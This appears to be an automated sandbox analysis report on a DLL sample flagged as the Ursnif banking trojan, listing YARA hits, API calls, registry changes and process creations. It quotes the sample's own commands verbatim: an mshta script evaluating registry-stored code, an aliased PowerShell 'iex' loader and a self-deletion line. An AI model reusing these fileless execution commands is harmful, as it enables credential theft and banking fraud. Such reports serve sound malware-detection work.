                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      E-Banking Fraud

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Disables SPDY (HTTP compression, likely to perform web injects)
                      Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D5FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Writes registry values via WMI
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D4BF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D1645
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D829C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0628FF4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0628D7F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062767CA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0628154D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06293DB0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0627B238
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0052B4B8
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00529660
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0052EEF8
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00547850
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00531864
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00532830
                      Source: C:\Windows\System32\control.exeCode function: 24_2_005498A8
                      Source: C:\Windows\System32\control.exeCode function: 24_2_005480A8
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0052716C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00525110
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0052410C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0053E120
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0053B9E0
                      Source: C:\Windows\System32\control.exeCode function: 24_2_005451A8
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00534240
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00531248
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0054C220
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00542AD8
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00548AC0
                      Source: C:\Windows\System32\control.exeCode function: 24_2_005473EC
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0054AC50
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0053C46C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0052D404
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00523C3C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00542428
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0054D4D4
                      Source: C:\Windows\System32\control.exeCode function: 24_2_005234D8
                      Source: C:\Windows\System32\control.exeCode function: 24_2_005434C0
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00536CA4
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00529D1C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0053CD1C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00540530
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00547DB4
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00541E5C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00538670
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00541638
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0053BED0
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00532EE8
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00545684
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00521EA8
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00534F5C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00536F78
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0054772C
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0052572C
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572393EEF8
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572393B4B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572395C220
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723941248
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723944240
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_00000157239551A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572394B9E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572393410C
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723935110
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572394E120
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_00000157239598A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_00000157239580A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723942830
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723957850
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723941864
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723946F78
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572395772C
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572393572C
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723944F5C
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723955684
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723931EA8
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572394BED0
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723942EE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723951638
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723948670
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723951E5C
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723939660
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723957DB4
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723950530
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572394CD1C
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723939D1C
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723946CA4
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572395D4D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_00000157239534C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_00000157239334D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572393D404
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723952428
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572395AC50
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723933C3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572394C46C
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_00000157239573EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723958AC0
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723952AD8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06288E57 CreateProcessAsUserW,
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: 2oCOO5LbPu.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2oCOO5LbPu.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D4321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D190C GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D6D0A NtMapViewOfSection,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D84C1 NtQueryVirtualMemory,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0628BE80 NtMapViewOfSection,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06280782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0627C431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062774AE NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06286DE0 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06282331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06285312 NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0628A806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062800DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0627710A GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06287950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062861AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062736BB NtGetContextThread,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0627D77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0627B7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062764C4 memset,NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06285220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0628EAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06283829 NtQuerySystemInformation,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062710C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0053583C NtCreateSection,
                      Source: C:\Windows\System32\control.exeCode function: 24_2_005240C0 NtReadVirtualMemory,
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0054A148 NtQueryInformationProcess,
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0052B11C RtlAllocateHeap,NtQueryInformationProcess,
                      Source: C:\Windows\System32\control.exeCode function: 24_2_005341D8 NtMapViewOfSection,
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0052AA6C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,
                      Source: C:\Windows\System32\control.exeCode function: 24_2_005404CC NtAllocateVirtualMemory,
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00526D24 NtWriteVirtualMemory,
                      Source: C:\Windows\System32\control.exeCode function: 24_2_005265E4 NtQueryInformationToken,NtQueryInformationToken,NtClose,
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00529660 NtSetContextThread,NtUnmapViewOfSection,NtClose,
                      Source: C:\Windows\System32\control.exeCode function: 24_2_0055F002 NtProtectVirtualMemory,NtProtectVirtualMemory,
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572395A148 NtQueryInformationProcess,
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_00000157239365E4 NtQueryInformationToken,NtQueryInformationToken,NtClose,
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572396F002 NtProtectVirtualMemory,NtProtectVirtualMemory,
                      Source: 2oCOO5LbPu.dllBinary or memory string: OriginalFilenamemyfile.exe$ vs 2oCOO5LbPu.dll
                      Source: 2oCOO5LbPu.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220504Jump to behavior
                      Source: 2E09.bin.27.drBinary string: Boot Device: \Device\HarddiskVolume2
                      Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winDLL@61/27@11/4
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: 2oCOO5LbPu.dllReversingLabs: Detection: 50%
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
